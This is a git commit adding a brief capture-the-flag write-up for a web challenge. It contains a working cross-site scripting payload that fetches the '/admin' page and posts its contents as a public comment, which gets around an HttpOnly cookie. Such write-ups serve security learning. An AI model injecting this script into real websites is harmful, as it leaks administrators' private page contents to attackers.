diff options
| author | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
|---|---|---|
| committer | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
| commit | b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch) | |
| tree | 49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/web_03.md | |
initial commit
Diffstat (limited to 'punkctf/web_03.md')
| -rw-r--r-- | punkctf/web_03.md | 15 |
1 files changed, 15 insertions, 0 deletions
diff --git a/punkctf/web_03.md b/punkctf/web_03.md new file mode 100644 index 0000000..a1d2e1e --- /dev/null +++ b/punkctf/web_03.md @@ -0,0 +1,15 @@ + +The cookie is HttpOnly now, but we only care about the contents of `/admin`, not the cookie, so we can use the same payload for `Subdomain Takeover - Easy`, but without doing the subdomain takeover. + +``` +fetch('/admin').then(r => r.text()).then(d => { + let data = new URLSearchParams(); + data.append('name', 'admin page'); + data.append('comment', d); + fetch('/new-comment', { + method: 'POST', + headers: { "Content-Type": "application/x-www-form-urlencoded" }, + body: data, + }); +}) +``` |